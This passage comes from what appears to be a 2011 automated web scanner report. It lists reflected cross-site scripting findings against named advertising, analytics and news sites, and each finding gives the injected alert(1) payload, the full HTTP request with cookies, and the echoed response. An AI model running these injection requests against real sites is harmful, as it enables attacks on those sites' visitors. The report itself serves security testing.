/QMc8IfG3T0SVon4DctEpdZM8+I="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 16:16:51 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 10 May 2011 16:16:51 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:16:51 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G055249E673<SCRIPT>ALERT(1)</SCRIPT>737368F0232" was not recognized.
*/

2.108. http://k.collective-media.net/cmadj/cm.quadhearst/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.quadhearst/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fda5c'-alert(1)-'4ac9c29976 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.quadhearstfda5c'-alert(1)-'4ac9c29976/;sz=300x250;net=cm;ord=1304957833;env=ifr;ord1=154691;cmpgurl=http%253A//www.sfgate.com/cgi-bin/article.cgi%253Ff%253D/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:36 GMT
Connection: close
Content-Length: 8178

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-88830575_1304957856","http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadhearstfda5c'-alert(1)-'4ac9c29976&size=300x250&imp_id=cm-88830575_1304957856,11f8f328940989e&referrer=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L332
...[SNIP]...

2.109. http://onespot.sfgate.com/ism/business_4/index.js [_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onespot.sfgate.com
Path:	/ism/business_4/index.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload e55b4<script>alert(1)</script>6b029e9ff02 was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/business_4/index.js?url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&have_content=true&callback=onespot.dispatch&_=1304957814608e55b4<script>alert(1)</script>6b029e9ff02 HTTP/1.1
Host: onespot.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; SiteLifeHost=l3vm189l3pluckcom; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Mon, 09 May 2011 16:17:58 GMT
ETag: "ceac37cb2c1c7dd7c9d2bc9c4e618f4e"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 108
X-Varnish: 555914849
Connection: keep-alive
Content-Length: 13225

onespot.dispatche55b4<script>alert(1)</script>6b029e9ff02({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\r\n <title>OneSpot NextClick&
...[SNIP]...

2.110. http://onespot.sfgate.com/ism/business_4/index.js [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onespot.sfgate.com
Path:	/ism/business_4/index.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f4835<script>alert(1)</script>a83034bea8e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/business_4/index.js?url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&have_content=true&callback=onespot.dispatchf4835<script>alert(1)</script>a83034bea8e&_=1304957814608 HTTP/1.1
Host: onespot.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; SiteLifeHost=l3vm189l3pluckcom; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Mon, 09 May 2011 16:17:55 GMT
ETag: "d85c548668033fc910519ab2a44b4e8a"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 146
X-Varnish: 1036794752
Connection: keep-alive
Content-Length: 13225

onespot.dispatchf4835<script>alert(1)</script>a83034bea8e({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\r\n <title>OneSpot NextClick&
...[SNIP]...

2.111. http://pglb.buzzfed.com/43442/a07b648008ec0cba5cc00e2ff0712c14 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/43442/a07b648008ec0cba5cc00e2ff0712c14

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 128ab<script>alert(1)</script>04b5cb065d0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /43442/a07b648008ec0cba5cc00e2ff0712c14?callback=BF_PARTNER.gate_response128ab<script>alert(1)</script>04b5cb065d0&cb=3035 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604789
Expires: Mon, 16 May 2011 16:17:23 GMT
Date: Mon, 09 May 2011 16:17:34 GMT
Connection: close

BF_PARTNER.gate_response128ab<script>alert(1)</script>04b5cb065d0(1304946758);

2.112. http://ping.crowdscience.com/ping.js [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6388f'-alert(1)-'da8f81fa76b was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ping.js?url=http%3A%2F%2Fwww.americanbankingnews.com%2F2011%2F05%2F09%2Fmorgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight%2F&id=824d28492f&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F534.24%20(khtml%2C%20like%20gecko)%20chrome%2F11.0.696.65%20safari%2F534.24&x=1304957881293&c=0&t=0&v=0&m=06388f'-alert(1)-'da8f81fa76b HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=6522d442e56f04a6

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=6522d442e56f04a6; Domain=.crowdscience.com; expires=Sun, 07 Aug 2011 16:19:24; Path=/
Content-Length: 8345
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...
678dfc866822f34179ee75bcef&vguid=6522d442e56f04a6&sc=eNotjUEKwzAMBP+iszGSVrKs/KYYSnNKaFJ6KP17XchlGZiB/dBtPGkRierNVQIpYIMVOsZ9isqF9vcFr8d6Hv86VbpVZJqqe9NC49xo4crMUAvuc8ysBzgKbfMCXNGyi7hbc2Hg+wNHgBzc&m=06388f'-alert(1)-'da8f81fa76b&style=' + self.style;
return self;
})();

CrowdScience.imageUrls = [
'http://static.crowdscience.com/invlogo/dir02/logo_2_cfb3d7025ed297972e88
...[SNIP]...

2.113. http:/redacted [size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.keywordblocks.com
Path:	/cmedianet

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90bc3'%3balert(1)//8e37ba7c1d4 was submitted in the size parameter. This input was echoed as 90bc3';alert(1)//8e37ba7c1d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmedianet?cid=7CUL160O6&size=300x25090bc3'%3balert(1)//8e37ba7c1d4&crid=822543251 HTTP/1.1
Host: search.keywordblocks.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=50vr5108253329217967

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:17:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 10112

var _mN = {};
_mN._util = {
   isAdProviderUrl : function(url)
   {
       if (url==undefined || url=="")
       {
           return false;
       }
return (_mN._sjc.providers.test(url))
   },
   checkUrlD
...[SNIP]...
andom() * chars.length)];
}
return str;
}
};

_mN._sjc = {
   dynamicJSLocation : "http://search.keywordblocks.com/cmdynet?",
   cid : '7CUL160O6',
   size : '300x25090bc3';alert(1)//8e37ba7c1d4',
   cp : _mN._util.getRandomString(65),
   crid: '822543251',
   macros : new RegExp(/\$\{SOURCEURLENC\}|\{pageurl\}|\{SOURCE_URL_ENC\}|\$\{BUYER_LINE_ITEM_ID\}|\$\{CLICKURLENC\}|\$\{PRICE_CENTS\}|\$\{P
...[SNIP]...

2.114. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 502d8'%3balert(1)//10f1f07e9de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 502d8';alert(1)//10f1f07e9de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mmtnt.php?mm_pub=7271&mm_channel=&502d8'%3balert(1)//10f1f07e9de=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:14 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 22:19:14 GMT; path=/; domain=.mmismm.com
Content-Length: 470
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?mm_pub=7271&mm_channel=&502d8';alert(1)//10f1f07e9de=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'">
...[SNIP]...

2.115. http://thestreet.onespot.com/ism/bottom/index.js [_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thestreet.onespot.com
Path:	/ism/bottom/index.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload 1b0f8<script>alert(1)</script>12fcb93a802 was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/bottom/index.js?url=http%3A%2F%2Fwww.thestreet.com%2Fstory%2F11111015%2F1%2Fcitigroup-shares-should-be-avoided-analyst.html&have_content=true&callback=onespot.dispatch&_=13049578099921b0f8<script>alert(1)</script>12fcb93a802 HTTP/1.1
Host: thestreet.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Mon, 09 May 2011 16:17:20 GMT
ETag: "6ec7091c5f488cfaa2e7233f08027154"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 43
X-Varnish: 1059792150
Connection: keep-alive
Content-Length: 1444

onespot.dispatch1b0f8<script>alert(1)</script>12fcb93a802({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

2.116. http://thestreet.onespot.com/ism/bottom/index.js [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thestreet.onespot.com
Path:	/ism/bottom/index.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8217f<script>alert(1)</script>84dce28f47b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/bottom/index.js?url=http%3A%2F%2Fwww.thestreet.com%2Fstory%2F11111015%2F1%2Fcitigroup-shares-should-be-avoided-analyst.html&have_content=true&callback=onespot.dispatch8217f<script>alert(1)</script>84dce28f47b&_=1304957809992 HTTP/1.1
Host: thestreet.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Mon, 09 May 2011 16:17:17 GMT
ETag: "70ccfd8407509b929f3f31a53455a8f1"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 27
X-Varnish: 1059791686
Connection: keep-alive
Content-Length: 1444

onespot.dispatch8217f<script>alert(1)</script>84dce28f47b({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

2.117. http://thestreet.onespot.com/ism/top/index.js [_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thestreet.onespot.com
Path:	/ism/top/index.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload 35765<script>alert(1)</script>3fb8da5406a was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/top/index.js?url=http%3A%2F%2Fwww.thestreet.com%2Fstory%2F11111015%2F1%2Fcitigroup-shares-should-be-avoided-analyst.html&have_content=true&callback=onespot.dispatch&_=130495780999235765<script>alert(1)</script>3fb8da5406a HTTP/1.1
Host: thestreet.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Mon, 09 May 2011 16:17:19 GMT
ETag: "002c957ca72889b15fa435991b2db8e1"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 139
X-Varnish: 1059791977
Connection: keep-alive
Content-Length: 5584

onespot.dispatch35765<script>alert(1)</script>3fb8da5406a({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

2.118. http://thestreet.onespot.com/ism/top/index.js [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thestreet.onespot.com
Path:	/ism/top/index.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d3578<script>alert(1)</script>d49043a0f7b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/top/index.js?url=http%3A%2F%2Fwww.thestreet.com%2Fstory%2F11111015%2F1%2Fcitigroup-shares-should-be-avoided-analyst.html&have_content=true&callback=onespot.dispatchd3578<script>alert(1)</script>d49043a0f7b&_=1304957809992 HTTP/1.1
Host: thestreet.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Mon, 09 May 2011 16:17:17 GMT
ETag: "8b90254b54bbd446ec5e054d95782079"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 209
X-Varnish: 1059791597
Connection: keep-alive
Content-Length: 5584

onespot.dispatchd3578<script>alert(1)</script>d49043a0f7b({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

2.119. http://www.linkedin.com/cws/share-count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/cws/share-count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 1f7ca<img%20src%3da%20onerror%3dalert(1)>9068e2ee358 was submitted in the url parameter. This input was echoed as 1f7ca<img src=a onerror=alert(1)>9068e2ee358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cws/share-count?url=http%3A%2F%2F247wallst.com%2F2011%2F05%2F06%2Fanticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg%2F1f7ca<img%20src%3da%20onerror%3dalert(1)>9068e2ee358 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utmz=23068709.1304721517.5.2.utmcsr=socialfollow.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=23068709.2028061763.1303163602.1304000549.1304721517.5; __utmv=23068709.guest

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1921259157982081075"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:9fTMjMEk307w-zjJPaKY2rec7beB8Q_JhQ0YWAegsJ7Clfjwpmy0Uc:1304957978:18b4427c92dd34a14841448a5f48fccd1b711a4d"; Version=1; Max-Age=1799; Expires=Mon, 09-May-2011 16:49:37 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Mon, 09 May 2011 16:19:38 GMT
Content-Length: 257

IN.Tags.Share.handleCount({"count":0,"url":"http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/1f7ca<img src=a onerror=alert(1)>9068e2ee358"});

2.120. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/bg/api/Connect.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0d3c'%3b675646231a1 was submitted in the REST URL parameter 1. This input was echoed as f0d3c';675646231a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

POST /bgf0d3c'%3b675646231a1/api/Connect.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/widgets/latestnews/light?width=275&height=350&showEst=false
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
